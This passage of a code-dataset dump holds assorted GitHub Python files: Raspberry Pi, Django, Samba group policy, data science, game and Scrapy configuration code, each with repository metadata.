img_rotated)\r\n\r\n","repo_name":"magic428/work_note","sub_path":"tools-dl-cv/warpAffine_exmps.py","file_name":"warpAffine_exmps.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28214800187","text":"from sense_hat import SenseHat\nfrom time import sleep\nimport random\n\nsense = SenseHat()\n\nsense.clear()\n\ndef randNumb(endOfRange):\n return random.randint(0,endOfRange)\n\nwhile(1):\n for y in range(0,8):\n for x in range(0,8):\n sense.set_pixel(x, y, (randNumb(255),randNumb(255),randNumb(255)))\n sleep(0.1)\n sense.clear()\n sleep(1)\n \n 
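# NB: the while(1) loop runs until the process is interrupted (Ctrl+C).\n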
","repo_name":"gdmgent-1819-iot/labo1-gdm-1718-jantemme","sub_path":"pixelator.py","file_name":"pixelator.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3627040803","text":"from django.core.management.base import BaseCommand, CommandError\nfrom env.models import Environ\nfrom project.models import Project\nfrom django.contrib.auth.models import User\nimport os\nfrom django.conf import settings\nimport getpass\nfrom env.tasks import restart\n\n\ndef edit_supervisor_conf():\n search = 'include /etc/nginx/conf.d/*.conf;'\n repl = 'include /etc/nginx/conf.d/*.conf; \\n include %s/*.conf;' % os.path.join(settings.BASE_DIR,'ci-conf')\n path = '/etc/nginx/nginx.conf'\n print('Edit %s' % path) \n with open(path, 'r') as f:\n tpl = f.read();\n tpl = tpl.replace(search,repl)\n with open(path,'w') as f:\n f.write(tpl)\n\n\ndef edit_nginx_conf():\n search = 'include /etc/nginx/conf.d/*.conf;'\n repl = 'include /etc/nginx/conf.d/*.conf; \\n include %s/*.conf;' % os.path.join(settings.BASE_DIR,'env-conf', 'nginx')\n path = '/etc/nginx/nginx.conf'\n print('Edit %s' % path) \n with open(path, 'r') as f:\n tpl = f.read();\n tpl = tpl.replace(search,repl)\n with open(path,'w') as f:\n f.write(tpl)\n\ndef make_conf():\n with open(os.path.join(settings.BASE_DIR,'ci-conf','django-ci.conf',), 'r') as f:\n tpl = f.read()\n tpl = tpl.replace('%base_dir%', str(settings.BASE_DIR))\n tpl = tpl.replace('%user%', getpass.getuser())\n \n with open(os.path.join(settings.BASE_DIR,'ci-conf','django-ci.conf',), 'w') as f:\n f.write(tpl)\n\n\ndef create_dirs():\n if not os.path.isdir(os.path.join(settings.BASE_DIR,'logs')):\n print('Creating log dir')\n os.mkdir(os.path.join(settings.BASE_DIR,'logs'))\n if not os.path.isdir(os.path.join(settings.BASE_DIR,'env-conf')):\n print('Creating conf dir')\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf'))\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf','nginx'))\n os.mkdir(os.path.join(settings.BASE_DIR,'env-conf','supervisor'))\nclass Command(BaseCommand):\n \n def handle(self, *args, **options):\n print('Installation...')\n create_dirs()\n make_conf()\n edit_nginx_conf()\n restart()\n ","repo_name":"zdimon/django-ci","sub_path":"ci/main/management/commands/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185582364","text":"import os\n# Facility to determine GPTs for user\ntry:\n from samba.gpclass import check_safe_path\nexcept ImportError:\n from samba.gp.gpclass import check_safe_path\n\nfrom .applier_backend import applier_backend\nfrom storage import cache_factory, registry_factory\nfrom gpt.gpt import gpt, get_local_gpt\nfrom util.util import (\n get_machine_name,\n is_machine_name\n)\nfrom util.kerberos import (\n machine_kinit\n , machine_kdestroy\n)\nfrom util.sid import get_sid\nimport util.preg\nfrom util.logging import log\n\nclass samba_backend(applier_backend):\n __user_policy_mode_key = 'Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\UserPolicyMode'\n\n def __init__(self, sambacreds, username, domain, is_machine):\n self.cache_path = '/var/cache/gpupdate/creds/krb5cc_{}'.format(os.getpid())\n self.__kinit_successful = machine_kinit(self.cache_path)\n if not self.__kinit_successful:\n raise Exception('kinit is not successful')\n self.storage = registry_factory('registry')\n 
self.storage.set_info('domain', domain)\n machine_name = get_machine_name()\n machine_sid = get_sid(domain, machine_name, is_machine)\n self.storage.set_info('machine_name', machine_name)\n self.storage.set_info('machine_sid', machine_sid)\n\n # User SID to work with HKCU hive\n self.username = username\n self._is_machine_username = is_machine\n if is_machine:\n self.sid = machine_sid\n else:\n self.sid = get_sid(self.storage.get_info('domain'), self.username)\n\n self.cache = cache_factory('regpol_cache')\n self.gpo_names = cache_factory('gpo_names')\n\n # Samba objects - LoadParm() and CredentialsOptions()\n self.sambacreds = sambacreds\n\n self.cache_dir = self.sambacreds.get_cache_dir()\n logdata = dict({'cachedir': self.cache_dir})\n log('D7', logdata)\n\n def __del__(self):\n if self.__kinit_successful:\n machine_kdestroy()\n\n def get_policy_mode(self):\n '''\n Get UserPolicyMode parameter value in order to determine if it\n is possible to work with user's part of GPT. This value is\n checked only if working for user's SID.\n '''\n upm = self.storage.get_hklm_entry(self.__user_policy_mode_key)\n if upm and upm.data:\n upm = int(upm.data)\n if upm < 0 or upm > 2:\n upm = 0\n else:\n upm = 0\n\n return upm\n\n def retrieve_and_store(self):\n '''\n Retrieve settings and strore it in a database\n '''\n # Get policies for machine at first.\n machine_gpts = list()\n try:\n machine_gpts = self._get_gpts(get_machine_name(), self.storage.get_info('machine_sid'))\n except Exception as exc:\n log('F2')\n raise exc\n\n if self._is_machine_username:\n self.storage.wipe_hklm()\n self.storage.wipe_user(self.storage.get_info('machine_sid'))\n for gptobj in machine_gpts:\n try:\n gptobj.merge_machine()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E26', logdata)\n\n # Load user GPT values in case user's name specified\n # This is a buggy implementation and should be tested more\n else:\n user_gpts = list()\n try:\n user_gpts = self._get_gpts(self.username, self.sid)\n except Exception as exc:\n log('F3')\n raise exc\n self.storage.wipe_user(self.sid)\n\n # Merge user settings if UserPolicyMode set accordingly\n # and user settings (for HKCU) are exist.\n policy_mode = self.get_policy_mode()\n logdata = dict({'mode': upm2str(policy_mode), 'sid': self.sid})\n log('D152', logdata)\n\n if policy_mode < 2:\n for gptobj in user_gpts:\n try:\n gptobj.merge_user()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E27', logdata)\n\n if policy_mode > 0:\n for gptobj in machine_gpts:\n try:\n gptobj.sid = self.sid\n gptobj.merge_user()\n except Exception as exc:\n logdata = dict()\n logdata['msg'] = str(exc)\n log('E63', logdata)\n\n def _check_sysvol_present(self, gpo):\n '''\n Check if there is SYSVOL path for GPO assigned\n '''\n if not gpo.file_sys_path:\n # GPO named \"Local Policy\" has no entry by its nature so\n # no reason to print warning.\n if 'Local Policy' != gpo.name:\n logdata = dict({'gponame': gpo.name})\n log('W4', logdata)\n return False\n return True\n\n def _get_gpts(self, username, sid):\n gpts = list()\n\n log('D45', {'username': username, 'sid': sid})\n # util.windows.smbcreds\n gpos = self.sambacreds.update_gpos(username)\n log('D46')\n for gpo in gpos:\n if self._check_sysvol_present(gpo):\n path = check_safe_path(gpo.file_sys_path).upper()\n slogdata = dict({'sysvol_path': gpo.file_sys_path, 'gpo_name': gpo.display_name, 'gpo_path': path})\n log('D30', slogdata)\n gpt_abspath = os.path.join(self.cache_dir, 'gpo_cache', 
path)\n obj = gpt(gpt_abspath, sid)\n obj.set_name(gpo.display_name)\n gpts.append(obj)\n else:\n if 'Local Policy' == gpo.name:\n gpts.append(get_local_gpt(sid))\n\n return gpts\n\ndef upm2str(upm_num):\n '''\n Translate UserPolicyMode to string.\n '''\n result = 'Not configured'\n\n if upm_num in [1, '1']:\n result = 'Merge'\n\n if upm_num in [2, '2']:\n result = 'Replace'\n\n return result\n","repo_name":"altlinux/gpupdate","sub_path":"gpoa/backend/samba_backend.py","file_name":"samba_backend.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"21914376340","text":"from worldobject import *\nfrom picowork.psprite import *\n\n\nclass Coin(WorldObject):\n sprites = None\n\n def __init__(self, tile_map):\n super().__init__(tile_map)\n\n self.collision_tag = 'coin'\n self.collision_bounds = (-0.1, 0, 0.1, 0.2)\n\n if Coin.sprites is None:\n image = get_image('gold_s.png')\n Coin.sprites = [PSprite(image, i * 9, 0, 9, 8) for i in range(6)]\n\n self.visual = PSpriteObject(Coin.sprites[0])\n self.visual.set_position(Vector2(0, 4) / PIXEL_PER_UNIT)\n self.add_element(self.visual)\n\n def update(self, delta_time):\n super().update(delta_time)\n self.update_physics(delta_time)\n self.visual.set_image(Coin.sprites[floor(self.time * 10 % 6)])","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7921714639","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 10:13:47 2022\n\n@author: Federico Amato\n\nRead CSV data and make Pickle File\n\"\"\"\nimport click\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport openpyxl\nimport pandas as pd\nimport logging\n\nfrom pathlib import Path\nROOT_DIR = Path(__file__).parent.parent.parent\n\n\ndef get_raw_data(fname):\n if str(fname).endswith('.csv'):\n df = pd.read_csv(fname, sep=';', decimal=',',\n index_col=0, \n parse_dates=True, \n infer_datetime_format=True, \n dayfirst=True)\n elif str(fname).endswith('.xlsx'):\n df = pd.read_excel(fname, decimal=',',\n index_col=0, parse_dates=True)\n df['SWC'] = df['SWC'].replace(0, np.NaN)\n df['Week'] = pd.Series(df.index).dt.isocalendar().week.values\n df['Month'] = df.index.month\n # NaN values in Precipitations and Irrigation are considered as null\n df['P'] = df['P'].fillna(0)\n df['I'] = df['I'].fillna(0)\n # Some column of the file may use dots as decimal\n # separators, so those columns are interpreted as \n # object type and must be casted to floats.\n # See for example SWC, Tavg, RHavg\n return df.astype(np.float64)\n\n\ndef make_pickle(df, out):\n try:\n df.to_pickle(out)\n except Exception:\n print(\"Something went wrong writing Pickle file.\\nTry again\")\n \n\ndef main(input_file, output_file, visualize=True):\n logging.info(f'\\n\\n{\"-\"*5} MAKE DATA {\"-\"*5}\\n\\n')\n data = get_raw_data(input_file)\n logging.info(f'The file:\\n'\n f'{input_file}\\n'\n f'has the shape {data.shape} with columns:')\n for c in data.columns:\n logging.info(c)\n make_pickle(data, output_file)\n if visualize:\n data.plot(subplots=True, figsize=(10, 16))\n plt.savefig(ROOT_DIR / 'visualization/data' / 'raw_data.png')\n plt.show()\n logging.info(f'\\n\\n{\"-\"*21}')\n return None\n\n\n@click.command()\n@click.option('-in', '--input-file',\n type=click.Path(exists=True),\n 
default=(ROOT_DIR/'data/raw'/'data.xlsx'),)\n@click.option('-out', '--output-file', \n type=click.Path(),\n default=(ROOT_DIR/'data/interim'/'data.pickle'),)\n@click.option('-v', '--visualize', is_flag=True,)\ndef make_data(input_file, output_file, visualize):\n \"\"\"\n Read raw CSV file and save the dataframe in a Pickle file.\n \"\"\"\n main(input_file, output_file, visualize=visualize)\n return None\n\n\nif __name__ == \"__main__\":\n input_file = ROOT_DIR / 'data/raw/db_villabate_deficit_6.csv'\n output_file = ROOT_DIR / 'data/interim/data.pickle'\n visualize = True\n main(input_file, output_file, visualize=visualize)","repo_name":"fedesss98/ml-to-eta-of-citrus-orchards","sub_path":"eta_ml/eta_ml/data/make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3518192637","text":"import json\nfrom os import getcwd, getenv, path\nfrom typing import Dict, Optional\n\nfrom pydantic import BaseModel, field_validator\n\nfrom .node import Node\n\n\nclass Manifest(BaseModel):\n nodes: Dict[str, Node]\n\n @field_validator(\"nodes\")\n @classmethod\n def nodes_are_models(cls, nodes: Dict[str, Node]) -> Dict[str, Node]:\n return {node_name: node for node_name, node in nodes.items() if node.is_model}\n\n @classmethod\n def load(cls, manifest_path: Optional[str] = None):\n \"\"\"Load a Manifest class from manifest file path.\"\"\"\n\n if not manifest_path:\n manifest_path = path.join(\n getenv(\"DBT_TARGET_DIR\", getcwd()), \"manifest.json\"\n )\n\n with open(manifest_path, \"r\", encoding=\"utf8\") as manifest_file:\n manifest_dict = json.load(manifest_file)\n return cls(**manifest_dict)\n\n def get_dependencies(self, node: Node):\n return [\n self.nodes[dependency].name\n for dependency in node.dependencies\n if dependency in self.nodes and self.nodes[dependency].is_model\n ]\n","repo_name":"lgrosjean/dbt-argo","sub_path":"src/dbt_argo/dbt/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35777511984","text":"#Write your code below this line 👇\n#Hint: Remember to import the random module first. 
🎲\nimport random\nprint(\" Welcome to my Heads or tails game\")\nchoice = input(\" call it: heads or tails ?:\" )\ncoin = random.randint(0,1)\n\nif coin == 0:\n    print(\"it's heads \")\nelse:\n    print(\"it's tails\") \n    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"andre-williamson/HEAD-_or-_TAILS-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18036200711","text":"import os\nimport matplotlib.pyplot as plt\n\ntrain_loss = []\ntrain_precision = []\ntrain_recall = []\nval_loss = []\nval_precision = []\nval_recall = []\n\ntrain_axis = []\nval_axis = []\n\n\nwith open('logs\\\\tuned_SuperPoint\\\\log.txt') as f:\n    lines = f.readlines()\n    for line in lines:\n        if 'train - loss :' in line:\n            train_loss.append(float(line[16:]))\n        if 'val - loss :' in line:\n            val_loss.append(float(line[14:]))\n        if 'train - precision :' in line:\n            train_precision.append(float(line[21:]))\n        if 'val - precision :' in line:\n            val_precision.append(float(line[19:]))\n        if 'train - recall :' in line:\n            train_recall.append(float(line[18:]))\n        if 'val - recall :' in line:\n            val_recall.append(float(line[16:]))\n\nfor i in range(0,len(train_loss)):\n    train_axis.append(90000+400*i)\nfor i in range(0,len(val_loss)):\n    val_axis.append(90000+286*i)\n\nplt.subplot(311)\nplt.plot(train_axis,train_loss,label=\"train_loss\")\nplt.plot(val_axis,val_loss,label=\"val_loss\")\nplt.ylabel('loss')\nplt.grid()\nleg0 = plt.legend(loc='upper right')\n\nplt.subplot(312)\nplt.plot(train_axis,train_precision,label=\"train_precision\")\nplt.plot(val_axis,val_precision,label=\"val_precision\")\nplt.ylabel('precision')\nplt.grid()\nleg1 = plt.legend(loc='upper right')\n\nplt.subplot(313)\nplt.plot(train_axis,train_recall,label=\"train_recall\")\nplt.plot(val_axis,val_recall,label=\"val_recall\")\nplt.ylabel('recall')\nleg2 = plt.legend(loc='upper right')\nplt.grid()\nplt.show()","repo_name":"Sioun/SuperPoint2022","sub_path":"visualization_loss.py","file_name":"visualization_loss.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"27041769201","text":"\"\"\"SOPORTECM URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import OrdenesView, VordenesView, GarantiasView, VgarantiasView, EordenesView, EgarantiasView, CclienteView, GclienteView, RegistroView, orden_print, ordenes_print, garantia_print, garantias_print, productos_print, ventas_print, venta_print\n#from .views import ProductosView, VordenesView, VgarantiasView, VproductosView\nfrom .views import IndexView, HomeView, AcercaView, ProductosView, VproductosView, EmpleadoView, VempleadosView, UsuarioView, VusuarioView, EusuarioView, DusuarioView, EproductosView, ClienteView, VclienteView, EclienteView, EempleadosView, AusuarioView, VentaView, VventaView, EventaView\n#from .views import CrearUsuarioView, CrearEmpleado, ProductosView\n#from django.views.generic.edit import CrearEmpleado\n\napp_name = 'CCOT'\nurlpatterns = [\n\n #path('', IndexView.as_view(), name='index'),\n path('', HomeView.as_view(), name='home'),\n path('IngresarOrdenes', OrdenesView.as_view(), name='ordenes'),\n path('CrearClientesOrdenes', CclienteView.as_view(), name='occlientes'),\n path('VerOrdenes', VordenesView.as_view(), name='vordenes'),\n path('EditarOrdenes/', EordenesView.as_view(), name='eordenes'),\n path('IngresarGarantias', GarantiasView.as_view(), name='garantias'),\n path('CrearClientesGarantias', GclienteView.as_view(), name='gcclientes'),\n path('VerGarantias', VgarantiasView.as_view(), name='vgarantias'),\n path('EditarGarantias/', EgarantiasView.as_view(), name='egarantias'),\n path('IngresarProductos', ProductosView.as_view(), name='productos'),\n path('VerProductos', VproductosView.as_view(), name='vproductos'),\n path('Acerca', AcercaView.as_view(), name='acerca'),\n path('EditarProductos/', EproductosView.as_view(), name='eproductos'),\n path('IngresarEmpleados', EmpleadoView.as_view(), name='cempleados'),\n path('VerEmpleados', VempleadosView.as_view(), name='vempleados'),\n path('EditarEmpleados/', EempleadosView.as_view(), name='eempleados'),\n path('CrearUsuarios', UsuarioView.as_view(), name='cusuarios'),\n path('VerUsuarios', VusuarioView.as_view(), name='vusuarios'),\n path('EditarUsuarios/', EusuarioView.as_view(), name='eusuarios'),\n path('EliminarUsuarios/', DusuarioView.as_view(), name='dusuarios'),\n path('ActivarUsuarios/', AusuarioView.as_view(), name='ausuarios'),\n path('ActivarUsuarios/', RegistroView.as_view(), name='ausuarios'),\n path('CrearClientes', ClienteView.as_view(), name='cclientes'),\n path('VerClientes', VclienteView.as_view(), name='vclientes'),\n path('EditarClientes/', EclienteView.as_view(), name='eclientes'),\n path('VentaProductos', VentaView.as_view(), name='ventas'),\n path('VerVentas', VventaView.as_view(), name='vventas'),\n path('EditarVentas/', EventaView.as_view(), name='eventas'),\n path('RegistrarUsuario', RegistroView.as_view(), name='rusuarios'),\n path('Ordenes/print', ordenes_print, name='ordenes_print'),\n path('Ordenes/print/', orden_print, name='orden_print_one'),\n path('Garantias/print', garantias_print, name='garantias_print'),\n path('Garantias/print/', garantia_print, name='garantia_print_one'),\n path('Productos/print', productos_print, name='productos_print'),\n path('Ventas/print', ventas_print, name='ventas_print'),\n path('Ventas/print/', venta_print, 
name='venta_print_one'),\n]\n","repo_name":"Alex1287/COMPUMASTER","sub_path":"SOPORTECM/Apps/CCOT/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19361022955","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom scipy.optimize import minimize\nfrom utils.plot import truncate_colormap\n\nnp.random.RandomState(42)\n\ndef plot_parity(trp, trt, tep, tet, string, limits, comp=[]):\n fig, ax = plt.subplots(1, 1, figsize=(7, 7))\n ax.set_xlabel(r'Exp. current density [mA/cm$^2$]',fontsize=18)\n ax.set_ylabel(r'Pred. current density [mA/cm$^2$]', fontsize=18)\n ax.set_xlim(limits[0], limits[1])\n ax.set_ylim(limits[0], limits[1])\n\n ax.scatter(np.array(trt), np.array(trp), c='grey', s=10, alpha=0.20)\n if len(comp) == 0:\n ax.scatter(np.array(tet), np.array(tep), c='crimson', s=10, alpha=0.80)\n else:\n ax.scatter(np.array(tet), np.array(tep), c=comp, cmap=cmap, s=10, alpha=0.8, vmin=0.0, vmax=0.75)\n\n # plot solid diagonal line\n ax.plot([limits[0], limits[1]], [limits[0], limits[1]], 'k-', linewidth=1.0)\n\n # plot dashed diagonal lines 0.1 eV above and below solid diagonal line\n pm = 0.1\n ax.plot([limits[0], limits[1]], [limits[0] + pm, limits[1] + pm], 'k--', linewidth=1.0, label=r'$\\pm %.2f \\mathrm{eV}$' % pm)\n ax.plot([limits[0] + pm, limits[1]], [limits[0], limits[1] - pm], 'k--', linewidth=1.0)\n\n ax.text(0.01, 0.99, string, family='monospace', fontsize=18, transform=ax.transAxes, va='top', color='k')\n ax.tick_params(labelsize=14)\n\n return fig\n\nwith open(f'dist_libraries/AgPdPtRu_equi.pkl', 'rb') as input:\n equi_dists = pickle.load(input)\n\nlibrary_names = ['AgPdPtRu',\n 'AgPdPt',\n 'AgPdRu',\n 'AgPtRu',\n 'PdPtRu',\n ]\n\nwith open(f'misc/exclude_ids.lst', 'rb') as input:\n exclude_ids = pickle.load(input)\n\npotid = {550:305,650:360,750:416,850:471}\npls = np.linspace(0,0.9,500)\n\ncmap = truncate_colormap(plt.get_cmap('plasma'), minval=0.9, maxval=0.0, n=100)\n\nl, c, a = [], [], []\nfor i, lib in enumerate(library_names):\n elems = [lib[i:i+2] for i in range(len(lib))[::2]]\n\n if lib == 'AgPtRu':\n with open(f'dist_libraries/{lib}_exp_adj.pkl', 'rb') as input:\n dists = pickle.load(input)\n else:\n with open(f'dist_libraries/{lib}_exp.pkl', 'rb') as input:\n dists = pickle.load(input)\n\n for j, d in enumerate(dists):\n comp = [d['comp'][e] for e in ['Ag','Pd','Pt','Ru']]\n if j not in exclude_ids[lib]:\n l.append(d)\n c.append(comp)\n a.append(lib)\n\ndef theo_act(dist, G_opt=0.1, a=-1, b=0.5, eU=0.85):\n kb, T = 8.617e-5, 298.15\n j_ki = b*np.exp((-np.abs(dist - G_opt) + 0.86 - eU) / (kb * T))\n j = a/96**2 * np.sum(1 / (1 / (1-b) + 1 / j_ki))\n return j\n\nbnds = {'a':(-np.inf,0),'b':(0,1),'G_opt':(-0.1,0.3)}\nstart_value = {'a':-1,'b':0.5,'G_opt':0.1}\n\ndef fit(x0, train_ids, dist, params = ['a','b','G_opt'], ads = 'both'):\n p = dict(zip(params, x0))\n t = np.zeros((len(train_ids),2))\n for n, tid in enumerate(train_ids):\n OH = theo_act(l[tid][('ontop', 'OH', dist)], **p)\n O = theo_act(l[tid][('fcc', 'O', dist)], **p)\n s = OH+O if ads == 'both' else locals()[ads]\n t[n,0], t[n,1] = s, -l[tid]['curr'][potid[850]]\n return np.mean(np.abs(np.sum(t,axis=1)))\n\nparam_combinations = [['a'],['a','b'],['a','G_opt'],['a','b','G_opt']]\nads = 'both'\n\nfor i, params in enumerate(param_combinations):\n for dist in ['gross','net']:\n all_test_err = np.array([])\n\n for lib in library_names:\n mask = np.array(a) 
!= lib\n train_ids = np.arange(len(a))[mask]\n test_ids = np.arange(len(a))[~mask]\n \n res = minimize(fit, x0=np.array([start_value[k] for k in params]), args=(train_ids,dist,params,ads), \n tol=1e-8, bounds=[bnds[k] for k in params], method='L-BFGS-B')\n \n p = dict(zip(params, res.x))\n result = [[], []], [[], []]\n\n for j, ids in enumerate([train_ids,test_ids]):\n for tid in ids:\n OH = theo_act(l[tid][('ontop', 'OH', dist)], **p)\n O = theo_act(l[tid][('fcc', 'O', dist)], **p)\n s = OH+O if ads == 'both' else locals()[ads]\n result[j][0].append(s)\n result[j][1].append(l[tid]['curr'][potid[850]])\n\n all_test_err = np.concatenate((all_test_err, np.array(result[1][0]) - np.array(result[1][1])))\n\n if i == 1 and dist == 'gross':\n s0 = f'Testset: {lib}'\n s1 = f'Train MAE = {np.mean(np.abs(np.array(result[0][0]) - np.array(result[0][1]))):.3f} mA'\n s2 = f'Test MAE = {np.mean(np.abs(np.array(result[1][0]) - np.array(result[1][1]))):.3f} mA'\n s3 = [f'{k} = {p[k]:.2f}' for k in p.keys()]\n s = '\\n'.join([s0,s1,s2,*s3])\n \n for k, e in enumerate(['Ag','Pd','Pt','Ru']):\n fig = plot_parity(*result[0],*result[1], s, [-0.7, 0.1], comp=np.array(c)[test_ids,k])\n plt.tight_layout()\n filename = f'plots_parity/{dist}_{i}_{lib}_{e}.png'\n fig.savefig(filename)\n print(f'[SAVED] {filename}')\n plt.close()\n\n print(f'Fit with {params} on {dist} distributions yielded test MAE of {np.mean(np.abs(all_test_err)):.3f} mA')\n","repo_name":"catalyticmaterials/AgPdPtRu_ORR","sub_path":"reproduction/05_fit_volcano.py","file_name":"05_fit_volcano.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14621461011","text":"from django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.authtoken import views as authviews\n\nfrom . 
import views\n\nrouter = DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'sensors', views.SensorViewSet)\nrouter.register(r'sensor-data', views.SensorDatumViewSet)\nrouter.register(r'events', views.EventViewSet)\nrouter.register(r'sessions', views.SessionViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^token-auth/', authviews.obtain_auth_token),\n url(r'^user-info/$', views.user_info),\n url(r'^user-info/(?P[0-9]+)/$', views.UserDetail.as_view())\n]\n","repo_name":"hereisabrams/PhobiaEnemy","sub_path":"api/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27557305168","text":"# import numpy\nimport numpy as np\n# import utils\nfrom .utils import rotationMatrix\n\n# *** Augmenter ***\n\nclass Augmenter(object):\n\n def __init__(self, augment_fn, feats, apply_count=1, **kwargs):\n # save function\n self.fn = augment_fn\n self.feats = feats\n # how many augmentations are created by this\n self.count = apply_count\n # parameters for augmentation function\n self.fn_kwargs = kwargs\n\n def apply(self, pc):\n return [self.fn(pc.copy(), feats=self.feats, **self.fn_kwargs) for _ in range(self.count)]\n\n def __call__(self, pc):\n return self.apply(pc)\n\n def dict(self):\n return {\n \"Augmentation\": self.fn.__name__,\n \"Count\": self.count,\n \"args\": self.fn_kwargs\n }\n\n# *** Augmentation Functions ***\n\ndef augment_mirror_pointcloud(pc, feats):\n for f in ['x', 'nx']:\n if f in feats:\n # get index of feat and invert it\n i = feats.index(f)\n pc[:, i] *= -1\n # return augmented pc\n return pc\n\ndef augment_rotate_pointcloud(pc, feats, rot_axis=['x', 'y', 'z']):\n # assertion\n assert all([(f in feats) for f in rot_axis]), \"All rotation axis must be features\"\n # get random rotations for 3 dimensions\n alphas = [(np.random.uniform(0, np.pi) if f in rot_axis else 0) for f in 'xyz']\n # create rotation matrix\n R = rotationMatrix(*alphas)\n # find features to rotate and apply rotation matrix\n idx = [feats.index(f) for f in 'xyz']\n pc[:, idx] = pc[:, idx] @ R.T\n # find normal features to rotate\n if all([('n'+f) in feats for f in 'xyz']):\n idx = [feats.index('n'+f) for f in 'xyz']\n # apply rotation\n pc[:, idx] = pc[:, idx] @ R.T\n # return rotated pointcloud\n return pc","repo_name":"ndoll1998/Pointnet4Berries","sub_path":"utils/augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73639046507","text":"def kiem_tra_so_may_man(num):\r\n #may_man = True\r\n while num > 0: # n = 5084, n nguyên dương mới làm\r\n new_num = num % 10 # số 4, lấy dư 8\r\n if new_num != 6 and new_num != 8:\r\n return False\r\n num //= 10 # num= num//10\r\n return True\r\n\r\n\r\nn = int(input(\"Nhập số nguyên dương n: \"))\r\nif kiem_tra_so_may_man(n):\r\n print(\"Số may mắn\")\r\nelse:\r\n print(\"Số ko may mắn\")\r\n","repo_name":"tdn548/PythonFoundation","sub_path":"Bai34_Tr7.py","file_name":"Bai34_Tr7.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13709602022","text":"# Scrapy settings for harvem project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. 
You can find more settings consulting the documentation:\n#\n# https://docs.scrapy.org/en/latest/topics/settings.html\n# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://docs.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'harvem'\n\nSPIDER_MODULES = ['harvem.spiders']\nNEWSPIDER_MODULE = 'harvem.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False #True\n\n#LOG_LEVEL = 'INFO'\n\n# set up Link Extractor's param:Allows \nLEA = [\"contact\", \"about\", \"carreer\", \"touch\", \"connect\" # en \n , \"kapcsolat\", \"koszonto\", \"bemutatkozas\", \"rolunk\", \"impresszum\", \"kezdolap\", \"elerhetoseg\" # hu\n , 'kontakt', 'willkommen', 'einfuhrung', 'uber-uns', 'impressum' # de\n] # add more!! \n#LEA = [] # there are no restrictions, so it crawls all pages\n\nID = 'az' \n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 1 #32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\nDOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN = 1 #16\n#CONCURRENT_REQUESTS_PER_IP = 1 #16\n\n# Disable cookies (enabled by 